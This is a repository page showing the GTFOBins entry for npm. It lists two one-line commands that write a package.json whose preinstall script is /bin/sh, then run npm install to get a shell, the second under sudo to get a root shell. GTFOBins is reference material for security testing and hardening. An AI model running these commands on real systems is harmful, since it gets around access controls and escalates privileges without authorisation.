This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
494ea89794289ec0ac8b9097ed8b49ab6526eb99
GTFOBins.github.io
/
_gtfobins
/
npm.md
Andrea Cardaci
2ce5e831b7
Fix npm
2021-01-21 15:04:27 +01:00
319 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json npm -C $TF i
code
TF=$(mktemp -d) echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json sudo npm -C $TF --unsafe-perm i
Reference in New Issue
View Git Blame
Copy Permalink